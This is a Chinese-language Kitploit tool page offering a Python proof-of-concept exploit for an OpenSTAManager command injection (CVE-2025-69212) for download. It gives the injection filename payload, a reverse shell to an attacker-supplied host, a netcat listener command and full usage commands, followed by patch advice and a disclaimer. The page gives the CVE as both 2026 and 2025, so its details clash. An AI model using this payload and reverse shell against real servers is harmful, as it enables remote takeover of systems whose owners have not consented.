Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-69212 — Python poc, exploit for CVE-2025-69212 | Kitploit
工具/GitHubGitHub/c0gnit00/cve-2026-69212
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and ControlPayload Development
GitHubc0gnit00/cve-2026-69212

CVE-2026-69212

Python poc, exploit for CVE-2025-69212

查看仓库
21个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-69212 — OpenSTAManager OS命令注入(远程代码执行)

CVE-2025-69212的概念验证利用程序,该漏洞是OpenSTAManager <= 2.9.8中的一个OS命令注入漏洞,允许经过身份验证的攻击者通过恶意构造的ZIP文件上传实现远程代码执行。

安全公告

  • CVE: CVE-2025-69212
  • GHSA: GHSA-25fp-8w8p-mx36
  • 受影响版本: OpenSTAManager <= 2.9.8
  • 修复版本: OpenSTAManager 2.9.9+
  • CVSS: 严重

漏洞详情

该漏洞存在于 src/Util/XML.php 文件的第100行附近,应用程序在未进行任何清理的情况下,将用户控制的文件名直接传递给 shell 的 exec() 调用:

root@kitploit:~
exec('openssl smime -verify -noverify -in "' . $file . '" -inform DER -out "' . $output_file . '"');

当通过 importFE_ZIP 插件(/actions.php)上传ZIP压缩包时,应用程序会解压该ZIP文件,并将每个 .p7m 条目的文件名传递给 exec()。攻击者可以构造一个包含恶意文件名的ZIP文件,该文件名能够突破双引号参数的限制并注入任意shell命令。

注入载荷(文件名):

root@kitploit:~
invoice.p7m";<COMMAND>;echo ".p7m

产生的 shell 执行:

root@kitploit:~
openssl smime ... -in "invoice.p7m";<COMMAND>;echo ".p7m" ...
#                                   ^^^^^^^^^^^^ 此处注入

注意: 正斜杠 / 不能直接出现在文件名中,因为 ZipArchive::extractTo() 会将其视为路径分隔符。PoC 通过对反弹 shell 载荷进行base64编码来避免此问题。


环境要求

  • Python 3.x
  • requests 库
  • 有效的 OpenSTAManager 凭据(任何有权访问导入插件的角色)
  • 攻击者机器上的监听器(例如 nc)

安装依赖:

root@kitploit:~
pip install requests

使用方法

root@kitploit:~
python3 CVE-2025-69212.py -u <目标URL> -U <用户名> -P <密码> --lhost <您的IP> --lport <您的端口>

选项

示例

root@kitploit:~
# 启动监听器
nc -lvnp 4444

# 运行漏洞利用
python3 CVE-2025-69212.py -u http://target.htb -U admin -P 'password' --lhost 10.10.14.5 --lport 4444

# 通过 Burp Suite 路由
python3 CVE-2025-69212.py -u http://target.htb -U admin -P 'password' --lhost 10.10.14.5 --lport 4444 --proxy http://127.0.0.1:8080

工作原理

  1. 身份验证 — 使用提供的凭据登录 OpenSTAManager
  2. 构造载荷 — 构建一个ZIP压缩包,其中包含一个 .p7m 文件,其文件名包含注入的命令
  3. Base64 编码 — 对反弹 shell(bash -i >& /dev/tcp/LHOST/LPORT 0>&1)进行base64编码,以避免文件名中出现正斜杠
  4. 上传 — 通过 importFE_ZIP 插件将ZIP文件POST到 /actions.php
  5. 执行 — 服务器解压ZIP文件,将恶意文件名传递给 exec(),从而触发反弹 shell
  6. 多线程 — 上传在守护线程中运行,因为bash会保持HTTP连接打开;脚本会干净地退出,无需等待响应

修复建议

将 OpenSTAManager 更新至 2.9.9 或更高版本,该版本在将文件名传递给 shell 命令之前会对其进行清理。

如果无法立即打补丁,请禁用 importFE_ZIP 插件,或将对 /actions.php 的访问限制为仅受信任的用户。


免责声明

此工具仅用于授权的安全测试和教育目的。请仅在你拥有所有权或获得明确书面许可的系统上使用。未经授权对不属于你的系统进行使用是非法且不道德的。作者不对因使用此工具而导致的任何误用或损害负责。


参考

  • GHSA-25fp-8w8p-mx36
  • OpenSTAManager GitHub
  • NVD - CVE-2025-69212
下载工具
参数必需描述
-u, --url是目标基础URL(例如 http://target.htb)
-U, --username是OpenSTAManager 用户名
-P, --password是OpenSTAManager 密码
--lhost是用于反弹 shell 的您的 IP 地址
--lport是用于反弹 shell 的您的监听端口
--proxy否HTTP 代理(例如 http://127.0.0.1:8080)